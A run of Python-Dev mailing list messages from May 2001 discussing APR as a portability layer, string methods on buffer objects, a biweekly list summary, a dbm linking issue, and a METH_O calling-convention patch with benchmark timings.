M.


From gstein at lyra.org  Thu May 24 15:59:21 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 06:59:21 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>; from mwh@python.net on Thu, May 24, 2001 at 02:02:34PM +0100
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <20010524065921.E5402@lyra.org>

On Thu, May 24, 2001 at 02:02:34PM +0100, Michael Hudson wrote:
> I can't think of a good way of expressing this, but I don't think we
> should try to make writing non cross-platform code in Python impossible.

I don't think this would preclude writing non cross-platform code. As I
mentioned, there isn't anything that would prevent the stuff from working
side by side.

The idea is to simplify certain aspects of Python's platform specific stuff.
For example: all those variants of dynamically loading shared modules
(Python/dynload_*.c) can be tossed along with the config magic.

> Yes, it should be easy to write x-platform code, but if there's some very
> specific platform trick I can do with, say, setsockopt, I don't want
> Python to hide it from me just 'cause it doesn't work on VMS.

APR isn't a least common denominator approach.

>...
> > That doc is out of date; the list is missing: shared library handling, i18n,
> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face)

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff support optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure it's smaller.

It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
those other platforms and reduce the Python code even more.


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal at lemburg.com  Thu May 24 16:54:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritance.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
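A minimal Python 3 sketch of the adaptor idea, assuming memoryview as the stand-in for the buffer object; `BufferAdaptor` is a hypothetical class, and only two string methods are shown:

```python
class BufferAdaptor:
    """Hypothetical adaptor exposing string-style methods over a buffer.

    Any object supporting the buffer protocol can be wrapped, so the
    methods are written once here instead of once per type.
    """

    def __init__(self, obj):
        # A flat byte-level view; no copy is made at construction time.
        self._view = memoryview(obj).cast('B')

    def __len__(self):
        return len(self._view)

    def find(self, sub, start=0):
        return self._view.tobytes().find(sub, start)

    def upper(self):
        return self._view.tobytes().upper()
```

Holding the memoryview keeps the wrapped object's buffer exported, so, for example, a wrapped bytearray cannot be resized while the adaptor is alive.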
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Thu May 24 17:55:23 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
	<20010524013349.Y5402@lyra.org>
	<3B0CE00A.488C8D73@lemburg.com>
	<20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.

Skip


From skip at pobox.com  Thu May 24 17:58:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
	<Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh at python.net  Thu May 24 18:38:37 2001
From: mwh at python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration). All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.
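 The str.encode('zlib') spelling above is from the Python 2 era.  In
 Python 3, bytes-to-bytes codecs are reached through the codecs module
 (the 'zlib', 'base64' and 'quopri' aliases are available from Python
 3.4), so a rough equivalent looks like this:

```python
import codecs

# Compress, then base64-encode: each step is a bytes-to-bytes codec.
packed = codecs.encode(codecs.encode(b"abc", "zlib"), "base64")
print(packed)

# Reverse the chain to recover the original bytes.
print(codecs.decode(codecs.decode(packed, "base64"), "zlib"))  # b'abc'

# Quoted-printable goes through the same API.
print(codecs.encode(b"caf\xe9", "quopri"))
```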


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days has
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.
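 The summary doesn't say how Tim gathered his numbers.  As a rough,
 hypothetical way to take a similar snapshot inside a modern CPython
 process, one can count live dicts by size with the gc module.  This
 undercounts: CPython does not track dicts holding only atomic values,
 so gc.get_objects() never sees them.

```python
import gc
from collections import Counter

def dict_size_histogram():
    """Map dict length -> number of live, GC-tracked dicts of that length."""
    return Counter(len(obj) for obj in gc.get_objects() if type(obj) is dict)
```

 For example, sorted(dict_size_histogram().items())[:10] lists the ten
 smallest sizes seen and how many dicts have each.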

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.
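 To see why a rich == can be cheaper than an old-style three-way
 compare for dict lookups (which only need equality), here is a
 pure-Python sketch.  It models the idea only, not CPython's C code,
 and cmp3/rich_eq are hypothetical names:

```python
def cmp3(a: str, b: str) -> int:
    """Old-style three-way compare: must decide <, == or >."""
    for x, y in zip(a, b):
        if x != y:
            return -1 if x < y else 1
    # Common prefix is equal; the shorter string sorts first.
    return (len(a) > len(b)) - (len(a) < len(b))


def rich_eq(a: str, b: str) -> bool:
    """Rich '==': only equality matters, so a length mismatch ends it early."""
    if len(a) != len(b):
        return False
    return all(x == y for x, y in zip(a, b))
```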

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  In discussing how much detail to give, the point was
 made that it's not really important to explain precisely *why* this
 happens; it suffices to convince the newbie that floating point is
 more complicated than he or she thinks.  Let's hope that suitable
 text is composed soon, and that people actually read it ... there
 have been two "floating point is broken" bug reports on sourceforge
 in just the last week.
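 A short illustration in present-day Python, whose repr() now picks
 the shortest string that round-trips (so 0.1 displays as 0.1); the
 '%.17g' format reproduces the 17-digit output quoted above:

```python
from decimal import Decimal
from fractions import Fraction

# Python 2.1's repr() formatted floats with 17 significant digits.
print('%.17g' % 0.1)        # 0.10000000000000001
# The exact binary value the literal 0.1 is rounded to:
print(Decimal(0.1))
print(Fraction(0.1))        # 3602879701896397/36028797018963968
# Fractions with a power-of-two denominator are stored exactly,
# so they print identically on every IEEE-754 platform.
print(Fraction(0.375))      # 3/8
print(0.375)                # 0.375
```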


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 Posix semantics everywhere, but this has two problems: (a) it's
 backwards incompatible, and (b) it's impossible (you can't avoid the
 race condition on Windows).  So maybe we'll just settle for better
 documentation.
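 For reference, Python 3.3 later added os.replace(), which overwrites
 an existing destination on both Posix and Windows.  A common use is
 write-to-temp-then-rename, sketched below; atomic_write is a
 hypothetical helper, and the atomicity guarantee is Posix's only:

```python
import os
import tempfile

def atomic_write(path: str, data: bytes) -> None:
    """Replace `path` with `data` via write-to-temp-then-rename."""
    # Keep the temp file in the target directory so the rename never
    # crosses a filesystem boundary.
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "wb") as tmp:
            tmp.write(data)
        # Overwrites an existing `path` on Posix and Windows alike; the
        # rename is atomic on Posix, Windows documents no such guarantee.
        os.replace(tmp_path, path)
    except BaseException:
        os.unlink(tmp_path)
        raise
```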


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2.1-maint branch
 in preparation for a 2.1.1 release.  There are as yet no firm (or even
 vague) plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein at lyra.org  Thu May 24 21:45:18 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 22:07:43 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip at pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip at pobox.com  Thu May 24 23:15:48 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas at xs4all.net  Thu May 24 23:42:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip at pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.)
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg at cosc.canterbury.ac.nz  Fri May 25 04:45:01 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From martin at loewis.home.cs.tu-berlin.de  Fri May 25 08:00:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).
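
To make the difference between the two conventions concrete, here is a Python model of the dispatch. It is a sketch under stated assumptions: `call_builtin`, `append_varargs` and `append_o` are hypothetical names, and the numeric flag values are illustrative rather than taken from the patch. In C the saving comes from skipping the argument tuple parse and the PyArg_ParseTuple format-string walk; the model only mirrors the shape of the calls.

```python
METH_VARARGS = 0x0001  # illustrative values, not taken from the patch
METH_O = 0x0008


def call_builtin(func, flags, self, args):
    """Hypothetical model of how the interpreter might invoke a C method."""
    if flags & METH_O:
        # Fast path: exactly one argument, handed over already unpacked.
        if len(args) != 1:
            raise TypeError(
                "function takes exactly 1 argument (%d given)" % len(args))
        return func(self, args[0])
    if flags & METH_VARARGS:
        # Generic path: the callee gets the whole tuple and must parse it.
        return func(self, args)
    raise ValueError("unsupported calling convention")


def append_varargs(self, args):
    (item,) = args  # stands in for PyArg_ParseTuple(args, "O", &item)
    self.append(item)


def append_o(self, item):
    self.append(item)  # no parsing step: the argument arrives directly
```

The arity check moves from every callee into the single dispatcher, which is why converting a method is "basically just remove the PyArg_ParseTuple call".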

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100      # 2,000,000 calls for cases 0 and 2
r1 = [1]*60                 # 60 appends per fresh list in case 1

def doit(case):
    s = clock()
    if case == 0:
        # one-argument builtin: ord()
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        # one-argument method: list.append(), bound method hoisted
        for i in indices:
            l = []
            f = l.append
            for x in r1:
                f(x)
    elif case == 2:
        # one-argument builtin: len()
        f = len
        for i in indices1:
            f("o")
    e = clock()
    return e - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.
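
"Speed-up" can be read as time saved or as throughput gained, and the two give different percentages. The sketch below recomputes both from the per-run timings in the two tables above (columns: ord, append, len); using the median of the ten runs is our choice, not the message's.

```python
from statistics import median

# Timings copied from the tables above: (ord, append, len) per run.
BEFORE = [
    (2.190, 1.800, 2.240), (2.200, 1.800, 2.220), (2.200, 1.800, 2.230),
    (2.220, 1.800, 2.220), (2.200, 1.800, 2.220), (2.200, 1.790, 2.240),
    (2.200, 1.790, 2.230), (2.200, 1.800, 2.220), (2.200, 1.800, 2.240),
    (2.200, 1.790, 2.230),
]
AFTER = [
    (1.440, 1.330, 1.460), (1.420, 1.350, 1.440), (1.430, 1.340, 1.430),
    (1.510, 1.350, 1.460), (1.440, 1.360, 1.470), (1.460, 1.330, 1.450),
    (1.430, 1.330, 1.420), (1.440, 1.340, 1.440), (1.430, 1.340, 1.430),
    (1.410, 1.340, 1.450),
]


def summarize(before, after, names=("ord", "append", "len")):
    """Map each case to (fraction of time saved, throughput ratio)."""
    result = {}
    for col, name in enumerate(names):
        b = median(row[col] for row in before)
        a = median(row[col] for row in after)
        result[name] = (1 - a / b, b / a)
    return result


for name, (saved, ratio) in summarize(BEFORE, AFTER).items():
    print("%-6s time saved %4.1f%%  throughput x%.2f" % (name, 100 * saved, ratio))
```

On the medians the patch saves roughly 26% (append) to 35% (ord, len) of the running time, which is a 1.34x to 1.54x throughput gain; the "30% to 50%" figure matches the throughput reading.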

Please let me know what you think.

Regards,
Martin


From mal at lemburg.com  Fri May 25 10:23:10 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 25 10:56:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion, though: I would change the way the
function is "declared" in the method list. You currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject *self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping at lfw.org  Fri May 25 12:56:33 2001
From: ping at lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein at lyra.org  Fri May 25 13:59:23 2001
From: gstein at lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
